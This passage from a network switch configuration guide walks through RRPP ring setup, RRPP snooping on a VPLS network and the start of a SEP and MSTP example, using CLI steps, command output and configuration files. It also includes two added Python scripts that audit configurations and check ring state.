[SwitchB-rrpp-domain-region2] ring 2 node-mode transit primary-port gigabitethernet 2/0/1 secondary-port gigabitethernet 2/0/2 level 0
[SwitchB-rrpp-domain-region2] ring 2 enable
[SwitchB-rrpp-domain-region2] quit

# Configure SwitchC as a transit node in ring 2 and specify the primary and secondary
interfaces.
[SwitchC] rrpp domain 2
[SwitchC-rrpp-domain-region2] ring 2 node-mode transit primary-port gigabitethernet 2/0/1 secondary-port gigabitethernet 2/0/2 level 0
[SwitchC-rrpp-domain-region2] ring 2 enable
[SwitchC-rrpp-domain-region2] quit

l Configure nodes in ring 1.


# Configure SwitchE as the master node in ring 1 (major ring) and specify the primary
and secondary interfaces.
[SwitchE] rrpp domain 1
[SwitchE-rrpp-domain-region1] ring 1 node-mode master primary-port gigabitethernet 1/0/1 secondary-port gigabitethernet 1/0/2 level 0


[SwitchE-rrpp-domain-region1] ring 1 enable
[SwitchE-rrpp-domain-region1] quit

# Configure SwitchC as a transit node in ring 1 and specify the primary and secondary
interfaces.
[SwitchC] rrpp domain 1
[SwitchC-rrpp-domain-region1] ring 1 node-mode transit primary-port gigabitethernet 1/0/1 secondary-port gigabitethernet 1/0/2 level 0
[SwitchC-rrpp-domain-region1] ring 1 enable
[SwitchC-rrpp-domain-region1] quit

# Configure SwitchD as a transit node in ring 1 and specify the primary and secondary
interfaces.
[SwitchD] rrpp domain 1
[SwitchD-rrpp-domain-region1] ring 1 node-mode transit primary-port gigabitethernet 1/0/1 secondary-port gigabitethernet 1/0/2 level 0
[SwitchD-rrpp-domain-region1] ring 1 enable
[SwitchD-rrpp-domain-region1] quit

Step 5 Enable RRPP.


# Configure SwitchA. The configurations of SwitchB, SwitchC, SwitchD, and SwitchE are
similar to the configuration of SwitchA, and are not mentioned here. For details, see the
configuration files.
[SwitchA] rrpp enable

Step 6 Verify the configuration.


After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration. The tangent point SwitchC is used as an
example.
# Run the display rrpp brief command on SwitchC. The following information is displayed:
[SwitchC] display rrpp brief
Abbreviations for Switch Node Mode :
M - Master , T - Transit , E - Edge , A - Assistant-Edge

RRPP Protocol Status: Enable


RRPP Working Mode: HW
RRPP Linkup Delay Timer: 0 sec (0 sec default)
Number of RRPP Domains: 2

Domain Index : 1
Control VLAN : major 10 sub 11
Protected VLAN : Reference Instance 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)
Ring Ring Node Primary/Common Secondary/Edge Is
ID Level Mode Port Port Enabled
----------------------------------------------------------------------------
1 0 T GigabitEthernet1/0/1 GigabitEthernet1/0/2 Yes

Domain Index : 2
Control VLAN : major 20 sub 21
Protected VLAN : Reference Instance 2
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)
Ring Ring Node Primary/Common Secondary/Edge Is
ID Level Mode Port Port Enabled
----------------------------------------------------------------------------
2 0 T GigabitEthernet2/0/1 GigabitEthernet2/0/2 Yes

According to the preceding information, RRPP is enabled on SwitchC; the major control
VLAN of RRPP domain 1 is VLAN 10 and the sub-control VLAN is VLAN 11; SwitchC is a
transit node in ring 1; the primary interface is GigabitEthernet1/0/1 and the secondary
interface is GigabitEthernet1/0/2.


The major control VLAN of SwitchC in RRPP domain 2 is VLAN 20 and the sub-control
VLAN is VLAN 21; SwitchC is a transit node in ring 2; the primary interface is
GigabitEthernet2/0/1 and the secondary interface is GigabitEthernet2/0/2.
On SwitchC, run the display rrpp verbose domain command. The following information is
displayed.
# Check detailed information about RRPP domain 1 on SwitchC.
[SwitchC] display rrpp verbose domain 1
Domain Index : 1
Control VLAN : major 10 sub 11
Protected VLAN : Reference Instance 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)

RRPP Ring : 1
Ring Level : 0
Node Mode : Transit
Ring State : LinkUp
Is Enabled : Enable Is Active: Yes
Primary port : GigabitEthernet1/0/1 Port status: UP
Secondary port : GigabitEthernet1/0/2 Port status: UP

# Check detailed information about RRPP domain 2 on SwitchC.


[SwitchC] display rrpp verbose domain 2
Domain Index : 2
Control VLAN : major 20 sub 21
Protected VLAN : Reference Instance 2
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)

RRPP Ring : 2
Ring Level : 0
Node Mode : Transit
Ring State : LinkUp
Is Enabled : Enable Is Active: Yes
Primary port : GigabitEthernet2/0/1 Port status: UP
Secondary port : GigabitEthernet2/0/2 Port status: UP

----End
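An audit of an RRPP node's configuration file against the Configuration Notes and roadmap of this example (STP disabled on every ring port, the major and sub-control VLANs carried on the ring trunks and mapped to the protected instance), added here as an example and not Huawei code. The sample file is constructed from the SwitchA configuration file in this section with one planted defect; the check generalizes to any node, including a tangent point with several domains.

```python
"""Audit an RRPP node's configuration file against the configuration notes above.
Added example, not Huawei code: it flags ring ports that still run STP, trunks that
drop the control or protected VLANs, and protected instances missing the control VLANs."""
import re

# Constructed sample based on the SwitchA configuration file in this section, with one
# planted defect for demonstration: GigabitEthernet2/0/2 lacks "stp disable".
SWITCH_CFG = """\
sysname SwitchA
#
rrpp enable
#
stp region-configuration
 instance 2 vlan 20 to 21
 active region-configuration
#
rrpp domain 2
 control-vlan 20
 protected-vlan reference-instance 2
 ring 2 node-mode master primary-port GigabitEthernet2/0/1 secondary-port GigabitEthernet2/0/2 level 0
 ring 2 enable
#
interface GigabitEthernet2/0/1
 port link-type trunk
 port trunk allow-pass vlan 20 to 21
 stp disable
#
interface GigabitEthernet2/0/2
 port link-type trunk
 port trunk allow-pass vlan 20 to 21
#
return
"""

VLAN_RANGE = re.compile(r"(\d+)(?: to (\d+))?")


def expand_vlans(spec):
    """Expand a VRP VLAN list such as '10 to 11 20 to 21' or '10 20 21' into a set."""
    return {v for lo, hi in VLAN_RANGE.findall(spec) for v in range(int(lo), int(hi or lo) + 1)}


def parse_config(text):
    """Collect MST instances, RRPP domains with their rings, and ring-port settings."""
    cfg = {"instances": {}, "domains": {}, "interfaces": {}}
    ctx = None  # current block: ("mst",), ("dom", domain id) or ("if", interface name)
    for line in (raw.strip() for raw in text.splitlines()):
        if line == "#":
            ctx = None
        elif line == "stp region-configuration":
            ctx = ("mst",)
        elif line.startswith("rrpp domain "):
            ctx = ("dom", int(line.split()[2]))
            cfg["domains"][ctx[1]] = {"rings": []}
        elif line.startswith("interface "):
            ctx = ("if", line.split()[1])
            cfg["interfaces"][ctx[1]] = {"trunk": False, "stp": True, "allow": set()}
        elif ctx and ctx[0] == "mst" and (m := re.match(r"instance (\d+) vlan (.+)", line)):
            cfg["instances"][int(m[1])] = expand_vlans(m[2])
        elif ctx and ctx[0] == "dom":
            d = cfg["domains"][ctx[1]]
            if line.startswith("control-vlan "):
                d["control"] = int(line.split()[1])
            elif line.startswith("protected-vlan reference-instance "):
                d["instance"] = int(line.split()[2])
            elif (m := re.match(r"ring (\d+) node-mode \S+ primary-port (\S+) secondary-port (\S+)", line)):
                d["rings"].append((int(m[1]), m[2], m[3]))
        elif ctx and ctx[0] == "if":
            itf = cfg["interfaces"][ctx[1]]
            itf["trunk"] |= line == "port link-type trunk"   # stays True once seen
            itf["stp"] &= line != "stp disable"              # False once STP is disabled
            if line.startswith("port trunk allow-pass vlan "):
                itf["allow"] |= expand_vlans(line.split("vlan ", 1)[1])
    return cfg


def audit(cfg):
    """Return human-readable findings; an empty list means the file passes the checks."""
    findings = []
    for dom_id, d in cfg["domains"].items():
        ctrl = {d["control"], d["control"] + 1}  # major control VLAN and its sub-control VLAN
        inst = cfg["instances"].get(d.get("instance"), set())
        if not ctrl <= inst:
            findings.append(f"domain {dom_id}: control VLANs {sorted(ctrl)} not mapped to instance {d.get('instance')}")
        for ring_id, *ports in d["rings"]:
            for port in ports:
                itf = cfg["interfaces"].get(port)
                if itf is None:
                    findings.append(f"ring {ring_id}: {port} is not configured")
                    continue
                if itf["stp"]:
                    findings.append(f"{port}: STP still enabled on RRPP ring port")
                if not itf["trunk"]:
                    findings.append(f"{port}: ring port is not a trunk")
                elif (missing := (ctrl | inst) - itf["allow"]):
                    findings.append(f"{port}: VLANs {sorted(missing)} not allowed on the trunk")
    return findings
```

Running `audit(parse_config(SWITCH_CFG))` reports the planted defect only; feed it the real `display current-configuration` text of each ring node to check all of them the same way.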

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 20 to 21
#
rrpp enable
#
stp region-configuration
instance 2 vlan 20 to 21
active region-configuration
#
rrpp domain 2
control-vlan 20
protected-vlan reference-instance 2
ring 2 node-mode master primary-port GigabitEthernet2/0/1 secondary-port GigabitEthernet2/0/2 level 0
ring 2 enable
#
interface GigabitEthernet2/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21
stp disable


#
interface GigabitEthernet2/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21
stp disable
#
return
l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 20 to 21
#
rrpp enable
#
stp region-configuration
instance 2 vlan 20 to 21
active region-configuration
#
rrpp domain 2
control-vlan 20
protected-vlan reference-instance 2
ring 2 node-mode transit primary-port GigabitEthernet2/0/1 secondary-port GigabitEthernet2/0/2 level 0
ring 2 enable
#
interface GigabitEthernet2/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21
stp disable
#
interface GigabitEthernet2/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21
stp disable
#
return
l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 10 to 11 20 to 21
#
rrpp enable
#
stp region-configuration
instance 1 vlan 10 to 11
instance 2 vlan 20 to 21
active region-configuration
#
rrpp domain 1
control-vlan 10
protected-vlan reference-instance 1
ring 1 node-mode transit primary-port GigabitEthernet1/0/1 secondary-port GigabitEthernet1/0/2 level 0
ring 1 enable
rrpp domain 2
control-vlan 20
protected-vlan reference-instance 2
ring 2 node-mode transit primary-port GigabitEthernet2/0/1 secondary-port GigabitEthernet2/0/2 level 0
ring 2 enable
#
interface GigabitEthernet1/0/1
port link-type trunk


undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 to 11
stp disable
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 to 11
stp disable
#
interface GigabitEthernet2/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21
stp disable
#
interface GigabitEthernet2/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21
stp disable
#
return
l Configuration file of SwitchD
#
sysname SwitchD
#
vlan batch 10 to 11
#
rrpp enable
#
stp region-configuration
instance 1 vlan 10 to 11
active region-configuration
#
rrpp domain 1
control-vlan 10
protected-vlan reference-instance 1
ring 1 node-mode transit primary-port GigabitEthernet1/0/1 secondary-port GigabitEthernet1/0/2 level 0
ring 1 enable
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 to 11
stp disable
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 to 11
stp disable
#
return
l Configuration file of SwitchE
#
sysname SwitchE
#
vlan batch 10 to 11
#
rrpp enable
#
stp region-configuration
instance 1 vlan 10 to 11
active region-configuration
#
rrpp domain 1


control-vlan 10
protected-vlan reference-instance 1
ring 1 node-mode master primary-port GigabitEthernet1/0/1 secondary-port GigabitEthernet1/0/2 level 0
ring 1 enable
#
interface GigabitEthernet1/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 to 11
stp disable
#
interface GigabitEthernet1/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 10 to 11
stp disable
#
return

Relevant Information
Video
Configure RRPP

7.7 Example for Configuring RRPP Snooping on a VPLS Network

RRPP Snooping Overview
RRPP snooping notifies a VPLS network of changes in an RRPP ring. After RRPP snooping
is enabled on sub-interfaces or VLANIF interfaces, the VPLS network can transparently
transmit RRPP packets, detect changes in the RRPP ring, and update forwarding entries,
ensuring that traffic can be rapidly switched to a non-blocking path.
As shown in Figure 7-8, UPEs constitute an RRPP ring and connect to the VPLS network
where NPEs are located. NPEs are connected through a PW, so they cannot serve as RRPP
nodes to respond to RRPP packets. As a result, the VPLS network cannot detect the RRPP
ring status change. When the RRPP ring topology changes, each node on the VPLS network
forwards downstream data according to the MAC address table generated before the RRPP
ring topology changes. Consequently, the downstream traffic cannot be forwarded.


Figure 7-8 Networking for Configuring RRPP snooping on a VPLS network
[Figure: UPEA and UPEB form an RRPP ring (P = primary interface, S = secondary interface) that attaches to the VPLS network formed by NPEA, NPEB, NPEC and NPED. The legend distinguishes data packets from hello packets.]

You can enable RRPP snooping on the sub-interface or VLANIF interface of NPED and
associate the interface with VSIs on the local device. When the RRPP ring is faulty, NPED on
the VPLS network deletes forwarding entries of VSIs (including the associated VSIs) on the
local node and forwarding entries of NPEB to re-learn forwarding entries. This ensures that
traffic can be switched to a normal path and downstream traffic can be properly forwarded.

Configuration Notes
l RRPP and RRPP snooping cannot be configured on the same interface.
l SA series cards and XGE interfaces connected to ET1D2IPS0S00, ET1D2FW00S00,
ET1D2FW00S01, ET1D2FW00S02, and ACU2 cards do not support RRPP snooping. In
versions earlier than V200R007C00, X1E series cards do not support RRPP snooping.
l The following describes the applicable product models and versions.

Networking Requirements
As shown in Figure 7-9, SwitchA, SwitchB, SwitchC, and SwitchD constitute an RRPP ring.
The network is required to prevent loops when the ring is complete and to implement fast
convergence to rapidly restore communication between nodes in the ring when the ring fails.
The VPLS network is able to transparently transmit RRPP packets, detect RRPP ring status
change, and update forwarding entries so that traffic can be rapidly switched to a normal path
according to the ring status.


Figure 7-9 Networking of RRPP snooping
[Figure: SwitchA and SwitchB form RRPP Ring 1 (control VLAN 20) on their GE1/0/1 and GE1/0/2 interfaces and attach to SwitchC and SwitchD on the VPLS network. On each of SwitchC and SwitchD, GE2/0/0.10 is bound to VSI 10 and GE2/0/0.20 is bound to VSI 20.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure a VPLS network.
2. Configure an RRPP ring to prevent loops and implement fast convergence when a device
fails.
3. Enable RRPP snooping so that the VPLS network can transparently transmit RRPP
packets and detect RRPP ring status change.
4. Associate interfaces with VSIs so that SwitchC and SwitchD on the VPLS network can
delete the MAC address tables of their VSIs when a fault occurs on the RRPP ring
network.
NOTE
VLAN termination sub-interfaces can be created on a non-VCMP client.

Procedure
Step 1 Configure VPLS. SwitchC is used as an example. The configuration of SwitchD is similar to
the configuration of SwitchC, and is not mentioned here. For details, see the configuration
files.
NOTE

This example provides only configurations of sub-interfaces on SwitchC and SwitchD connected to the
RRPP ring. The configurations of devices on the VPLS network are not mentioned.

# Configure GE2/0/0.10 on SwitchC to allow the packets of VLAN 10 to pass through and
bind GE2/0/0.10 to VSI 10.
<HUAWEI> system-view
[HUAWEI] sysname SwitchC
[SwitchC] interface gigabitethernet 2/0/0
[SwitchC-GigabitEthernet2/0/0] undo portswitch
[SwitchC-GigabitEthernet2/0/0] quit
[SwitchC] interface gigabitethernet 2/0/0.10
[SwitchC-GigabitEthernet2/0/0.10] dot1q termination vid 10
[SwitchC-GigabitEthernet2/0/0.10] l2 binding vsi VSI10 //Bind a VSI to the sub-interface.
[SwitchC-GigabitEthernet2/0/0.10] quit

# Configure GE2/0/0.20 on SwitchC to allow packets of VLAN 20 (control VLAN of RRPP) to pass through and bind GE2/0/0.20 to VSI 20.
[SwitchC] interface gigabitethernet 2/0/0.20
[SwitchC-GigabitEthernet2/0/0.20] dot1q termination vid 20


[SwitchC-GigabitEthernet2/0/0.20] l2 binding vsi VSI20
[SwitchC-GigabitEthernet2/0/0.20] quit

Step 2 Create an RRPP domain and its control VLAN.


# Create VLAN 10 on SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10
[SwitchA] stp region-configuration
[SwitchA-mst-region] instance 1 vlan 10 20 21 //Add the major control VLAN, sub-control VLAN, and data VLAN to instance 1.
[SwitchA-mst-region] active region-configuration
[SwitchA-mst-region] quit

# Configure SwitchA (master node in ring 1) in RRPP domain 1 and VLAN 20 as the control
VLAN.
[SwitchA] rrpp domain 1
[SwitchA-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure instance 1 as the protected instance of the RRPP domain.
[SwitchA-rrpp-domain-region1] control-vlan 20 //Each RRPP domain has a major control VLAN and a sub-control VLAN. You only need to specify the major control VLAN. The system uses the VLAN whose ID is one greater than the ID of the major control VLAN as the sub-control VLAN.
[SwitchA-rrpp-domain-region1] quit

# Create VLAN 10 on SwitchB.


<HUAWEI> system-view
[HUAWEI] sysname SwitchB
[SwitchB] vlan batch 10
[SwitchB] stp region-configuration
[SwitchB-mst-region] instance 1 vlan 10 20 21
[SwitchB-mst-region] active region-configuration
[SwitchB-mst-region] quit

# Configure SwitchB (transit node in ring 1) in RRPP domain 1 and VLAN 20 as the control
VLAN.
[SwitchB] rrpp domain 1
[SwitchB-rrpp-domain-region1] protected-vlan reference-instance 1
[SwitchB-rrpp-domain-region1] control-vlan 20
[SwitchB-rrpp-domain-region1] quit

Step 3 Disable STP on the interfaces to be added to the RRPP ring.


# Disable STP on the interfaces to be added to the RRPP ring on SwitchA.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[SwitchA-GigabitEthernet1/0/1] stp disable
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 10
[SwitchA-GigabitEthernet1/0/2] stp disable
[SwitchA-GigabitEthernet1/0/2] quit

# Disable STP on the interfaces to be added to the RRPP ring on SwitchB.


[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] port link-type trunk
[SwitchB-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[SwitchB-GigabitEthernet1/0/1] stp disable
[SwitchB-GigabitEthernet1/0/1] quit
[SwitchB] interface gigabitethernet 1/0/2


[SwitchB-GigabitEthernet1/0/2] port link-type trunk
[SwitchB-GigabitEthernet1/0/2] port trunk allow-pass vlan 10
[SwitchB-GigabitEthernet1/0/2] stp disable
[SwitchB-GigabitEthernet1/0/2] quit

Step 4 Create an RRPP ring.


# Configure SwitchA as the master node in ring 1 and specify the primary and secondary
interfaces.
[SwitchA] rrpp domain 1
[SwitchA-rrpp-domain-region1] ring 1 node-mode master primary-port gigabitethernet 1/0/1 secondary-port gigabitethernet 1/0/2 level 0
[SwitchA-rrpp-domain-region1] ring 1 enable
[SwitchA-rrpp-domain-region1] quit

# Configure SwitchB as a transit node in ring 1 (major ring) and specify the primary and
secondary interfaces.
[SwitchB] rrpp domain 1
[SwitchB-rrpp-domain-region1] ring 1 node-mode transit primary-port gigabitethernet 1/0/1 secondary-port gigabitethernet 1/0/2 level 0
[SwitchB-rrpp-domain-region1] ring 1 enable
[SwitchB-rrpp-domain-region1] quit

Step 5 Enable RRPP.


# Enable RRPP on SwitchA.
[SwitchA] rrpp enable

# Enable RRPP on SwitchB.


[SwitchB] rrpp enable

Step 6 Configure RRPP snooping.


# Enable RRPP snooping on GE2/0/0.20 of SwitchC.
[SwitchC] interface gigabitethernet 2/0/0.20
[SwitchC-GigabitEthernet2/0/0.20] rrpp snooping enable

# Enable RRPP snooping on GE2/0/0.20 of SwitchD.


[SwitchD] interface gigabitethernet 2/0/0.20
[SwitchD-GigabitEthernet2/0/0.20] rrpp snooping enable

Step 7 Configure association between interfaces and VSIs.


# Associate VSI 10 with GE2/0/0.20 on SwitchC.
[SwitchC-GigabitEthernet2/0/0.20] rrpp snooping vsi VSI10
[SwitchC-GigabitEthernet2/0/0.20] quit

# Associate VSI 10 with GE2/0/0.20 on SwitchD.


[SwitchD-GigabitEthernet2/0/0.20] rrpp snooping vsi VSI10
[SwitchD-GigabitEthernet2/0/0.20] quit

Step 8 Verify the configuration.


After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration. SwitchA is used as an example.
l Run the display rrpp brief command on SwitchA. The following information is
displayed:
[SwitchA] display rrpp brief
Abbreviations for Switch Node Mode :


M - Master , T - Transit , E - Edge , A - Assistant-Edge

RRPP Protocol Status: Enable


RRPP Working Mode: HW
RRPP Linkup Delay Timer: 0 sec (0 sec default)
Number of RRPP Domains: 1

Domain Index : 1
Control VLAN : major 20 sub 21
Protected VLAN : Reference Instance 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)

Ring Ring Node Primary/Common Secondary/Edge Is
ID Level Mode Port Port Enabled
----------------------------------------------------------------------------
1 0 M GigabitEthernet1/0/1 GigabitEthernet1/0/2 Yes

According to the preceding information, RRPP is enabled on SwitchA; the major control
VLAN of RRPP domain 1 is VLAN 20 and the sub-control VLAN is VLAN 21;
SwitchA is the master node in ring 1; the primary interface is GE1/0/1 and the secondary
interface is GE1/0/2.
l Run the display rrpp verbose domain command on SwitchA. The following
information is displayed.
# Check detailed information about RRPP domain 1 on SwitchA.
[SwitchA] display rrpp verbose domain 1
Domain Index : 1
Control VLAN : major 20 sub 21
Protected VLAN : Reference Instance 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)

RRPP Ring : 1
Ring Level : 0
Node Mode : Master
Ring State : Complete
Is Enabled : Enable Is Active : Yes
Primary port : GigabitEthernet1/0/1 Port status: UP
Secondary port : GigabitEthernet1/0/2 Port status: BLOCKED

# Check the RRPP snooping configuration on GE2/0/0.20 of SwitchC.


[SwitchC] display rrpp snooping enable interface gigabitethernet 2/0/0.20
Port VsiName Vlan
---------------------------------------------------------------------------
GigabitEthernet2/0/0.20 VSI20 20

You can see that VSI 20 and VLAN 20 are associated with GE2/0/0.20.
# Check information about other VSIs associated with GE2/0/0.20 on SwitchC.
[SwitchC] display rrpp snooping vsi interface gigabitethernet 2/0/0.20
Port VsiName
---------------------------------------------------------------------
GigabitEthernet2/0/0.20 VSI10
GigabitEthernet2/0/0.20 VSI20

You can see that GE2/0/0.20 is associated with VSI 10 and VSI 20.

----End
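A state check built on the command output shown in Step 8, added here as an example and not Huawei code: it parses display rrpp verbose domain output to confirm that the master has blocked its secondary port on a complete ring (and that a transit node sees LinkUp), and display rrpp snooping vsi interface output to confirm that the control-VLAN sub-interface is associated with the data VSI whose MAC entries must be flushed. The sample outputs are constructed from this section; the failed-ring output and its state label are assumed.

```python
"""Check an RRPP ring's state and the RRPP snooping VSI association from command output.
Added example, not Huawei code: parses 'display rrpp verbose domain' and
'display rrpp snooping vsi interface' output as shown in this section."""
import re

# Constructed from the SwitchA output above: master node with a complete ring.
MASTER_VERBOSE = """\
Domain Index      : 1
Control VLAN      : major 20 sub 21
Protected VLAN    : Reference Instance 1
Hello Timer       : 1 sec(default is 1 sec)  Fail Timer : 6 sec(default is 6 sec)

RRPP Ring         : 1
Ring Level        : 0
Node Mode         : Master
Ring State        : Complete
Is Enabled        : Enable               Is Active : Yes
Primary port      : GigabitEthernet1/0/1  Port status: UP
Secondary port    : GigabitEthernet1/0/2  Port status: BLOCKED
"""

# Constructed: the same master after a ring link failure, when it unblocks the
# secondary port so traffic can take the backup path (state label assumed).
MASTER_FAILED = MASTER_VERBOSE.replace("Complete", "Failed").replace("BLOCKED", "UP")

# Constructed: SwitchB's view as a transit node on the healthy ring.
TRANSIT_VERBOSE = MASTER_VERBOSE.replace("Master", "Transit").replace("Complete", "LinkUp").replace("BLOCKED", "UP")

# Constructed from the SwitchC output above.
SNOOPING_VSI = """\
Port                      VsiName
---------------------------------------------------------------------
GigabitEthernet2/0/0.20   VSI10
GigabitEthernet2/0/0.20   VSI20
"""


def parse_verbose(text):
    """Pick the fields a health check needs out of one domain's verbose output."""
    info = {}
    for line in text.splitlines():
        if (m := re.match(r"(Primary|Secondary) port\s*:\s*(\S+)\s+Port status:\s*(\S+)", line)):
            info[m[1].lower()] = (m[2], m[3])          # e.g. info["primary"] = (port, status)
        elif (m := re.match(r"(Domain Index|RRPP Ring|Node Mode|Ring State)\s*:\s*(\S+)", line)):
            info[m[1]] = m[2]
        elif (m := re.match(r"Control VLAN\s*:\s*major (\d+) sub (\d+)", line)):
            info["control"] = (int(m[1]), int(m[2]))
    return info


def ring_health(info):
    """Findings for one node's view of its ring; an empty list means the ring looks healthy."""
    findings = []
    major, sub = info["control"]
    if sub != major + 1:  # the sub-control VLAN is always the major control VLAN + 1
        findings.append(f"sub-control VLAN {sub} is not major control VLAN {major} + 1")
    mode, state = info["Node Mode"], info["Ring State"]
    (pport, pstat), (sport, sstat) = info["primary"], info["secondary"]
    if mode == "Master":
        # On a complete ring the master blocks its secondary port; both ports
        # forwarding means a ring link has failed and the backup path is active.
        if state != "Complete":
            findings.append(f"master ring state is {state}: a ring link is down")
        if (pstat, sstat) != ("UP", "BLOCKED"):
            findings.append(f"master ports {pport}={pstat} {sport}={sstat}, expected UP/BLOCKED")
    elif mode == "Transit" and (state, pstat, sstat) != ("LinkUp", "UP", "UP"):
        findings.append(f"transit ring state {state}, ports {pstat}/{sstat}, expected LinkUp UP/UP")
    return findings


def parse_snooping_vsi(text):
    """Map each RRPP snooping interface to the VSIs associated with it."""
    assoc = {}
    for line in text.splitlines():
        if (m := re.match(r"(\S+)\s+(VSI\S*)\s*$", line)):
            assoc.setdefault(m[1], set()).add(m[2])
    return assoc


def snooping_findings(assoc, interface, control_vsi, data_vsis):
    """The control-VLAN sub-interface must be associated with the VSI it is bound to
    and with every data VSI whose MAC entries must be flushed on a ring change."""
    have = assoc.get(interface, set())
    if not have:
        return [f"{interface}: RRPP snooping is not enabled"]
    return [f"{interface}: {v} is not associated" for v in sorted(({control_vsi} | set(data_vsis)) - have)]
```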

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10 20 to 21
#


rrpp enable
#
stp region-configuration
instance 1 vlan 10 20 to 21
active region-configuration
#
rrpp domain 1
control-vlan 20
protected-vlan reference-instance 1
ring 1 node-mode master primary-port GigabitEthernet1/0/1 secondary-port GigabitEthernet1/0/2 level 0
ring 1 enable
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 20 to 21
stp disable
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10 20 to 21
stp disable
#
return
l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 10 20 to 21
#
rrpp enable
#
stp region-configuration
instance 1 vlan 10 20 to 21
active region-configuration
#
rrpp domain 1
control-vlan 20
protected-vlan reference-instance 1
ring 1 node-mode transit primary-port GigabitEthernet1/0/1 secondary-port GigabitEthernet1/0/2 level 0
ring 1 enable
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10 20 to 21
stp disable
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 10 20 to 21
stp disable
#
return
l Configuration file of SwitchC
#
sysname SwitchC
#
interface GigabitEthernet2/0/0
undo portswitch
#
interface GigabitEthernet2/0/0.10
dot1q termination vid 10
l2 binding vsi VSI10
#
interface GigabitEthernet2/0/0.20
dot1q termination vid 20
l2 binding vsi VSI20


rrpp snooping enable
rrpp snooping vsi VSI10
#
return

l Configuration file of SwitchD
#
sysname SwitchD
#
interface GigabitEthernet2/0/0
undo portswitch
#
interface GigabitEthernet2/0/0.10
dot1q termination vid 10
l2 binding vsi VSI10
#
interface GigabitEthernet2/0/0.20
dot1q termination vid 20
l2 binding vsi VSI20
rrpp snooping enable
rrpp snooping vsi VSI10
#
return

Relevant Information
Video
Configure RRPP

7.8 Example for Configuring SEP and MSTP on a Network


Overview
Generally, redundant links are used to provide link backup and enhance network reliability.
The use of redundant links, however, may produce loops. Loops cause infinite looping of
packets. Consequently, broadcast storms occur and the MAC address table becomes unstable.
As a result, the communication quality deteriorates, and communication services may even be
interrupted. To block redundant links and ensure that the blocked links can be restored
immediately to resume communication when a link fault occurs on a ring network, you can
deploy SEP and MSTP on the ring network.

Configuration Notes
This example applies to all versions and products.

Networking Requirements
Multiple Layer 2 access devices need to be added because of business growth at company A.
As shown in Figure 7-10, multiple Layer 2 switching devices form a ring at the access layer,
and multiple Layer 3 devices form a ring at the aggregation layer. The aggregation layer uses
MSTP to eliminate redundant links. Company A requires that services be rapidly switched to
prevent traffic interruption when a link at the access layer fails.
You can deploy multiple Layer 2 devices in a ring and configure SEP to meet the following
requirements of company A:
l When there is no faulty link on the ring network, SEP can eliminate loops.

l When a link fails on the ring network, SEP can fast restore communication between
nodes in the ring.
l The topology change notification function is configured on an edge device in a SEP
segment so that devices on the upper-layer network can detect topology changes on the
lower-layer network in a timely manner. After receiving a topology change notification
from a lower-layer network, a device on an upper-layer network sends a TC packet to
instruct other devices to delete original MAC addresses and learn new MAC addresses.
This ensures nonstop traffic forwarding.

Figure 7-10 SEP and MSTP networking

[Figure 7-10 is an image and is not reproduced here. Recoverable content: the aggregation layer runs MSTP on PE1, PE2, PE3 and PE4; PE1 and PE2 are marked "Do not Support SEP". The access layer runs SEP segment 1 on LSW1, LSW2 and LSW3; GE1/0/1 on LSW1 and GE1/0/1 on LSW2 face PE1 and PE2. The CE connects through its GE1/0/1 to GE1/0/3 on LSW3. The service VLAN is VLAN 100. Legend: No-neighbor Primary Edge Port, No-neighbor Secondary Edge Port, Block Port (SEP), Block Port (MSTP).]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure basic SEP functions.
